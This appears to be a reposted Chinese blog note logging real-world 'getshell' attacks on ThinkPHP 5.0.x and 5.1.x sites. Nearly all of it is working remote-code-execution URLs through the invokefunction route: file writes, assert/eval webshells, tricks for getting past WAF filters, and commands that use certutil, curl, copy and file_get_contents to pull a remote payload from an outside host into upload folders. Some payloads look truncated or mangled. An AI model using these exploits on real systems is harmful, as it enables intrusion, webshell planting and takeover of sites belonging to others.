开发笔记:ThinkPHP5.x.x各版本实战环境getshell

篇首语：本文由编程笔记#小编为大家整理，主要介绍了ThinkPHP5.x.x各版本实战环境getshell相关的知识，希望对你有一定的参考价值。

1. #这个文章我之前在t00ls已经分享过了

   
   



2. #内容只是对tp5的实战环境下getshell做的记录，中间遇到的一些小问题的突破，没啥技术含量

   
   

-5.1.18

1. http://www.xxxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=

   
   

-5.0.5

1. waf对eval进行了拦截

   
   



2. 禁止了assert函数

   
   



3. 对eval函数后面的括号进行了正则过滤

   
   



4. 对file_get_contents函数后面的括号进行了正则过滤

   
   



5.  

   
   



6. http://www.xxxx.com/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=

   
   

-5.1.18

1. 所有目录都无写权限,base64函数被拦截

   
   



2.  

   
   



3. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_POST[1])

   
   

-5.0.18

1. windows

   
   



2. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][0]=1

   
   



3.  

   
   



4. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo()

   
   



5.  

   
   



6. 使用certutil

   
   



7. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=passthru&vars[1][0]=cmd /c certutil -urlcache -split -f https://www.hack.com/xxx.js uploads/1.php

   
   



8. 由于根目录没写权限，所以写到uploads

   
   

-5.0.14

1. eval（‘‘）和assert（‘‘）被拦截，命令函数被禁止

   
   



2.  

   
   



3. http://www.xxxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=phpinfo();

   
   



4.  

   
   



5. http://www.xxx.com/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][0]=eval($_GET[1])&1=call_user_func_array("file_put_contents",array("3.php",file_get_contents("https://www.hack.com/xxx.js")));

   
   

-5.0.11

1. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php

   
   

-5.0.14

1. php7.2

   
   



2. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=1.txt&vars[1][1]=1

   
   



3.  

   
   



4. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=

   
   



5. 写进去发现转义了尖括号

   
   



6.  

   
   



7. 通过copy函数

   
   



8. http://www.xxxx.cn/?s=admin/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]= https://www.hack.com/xxx.js&vars[1][1]=112233.php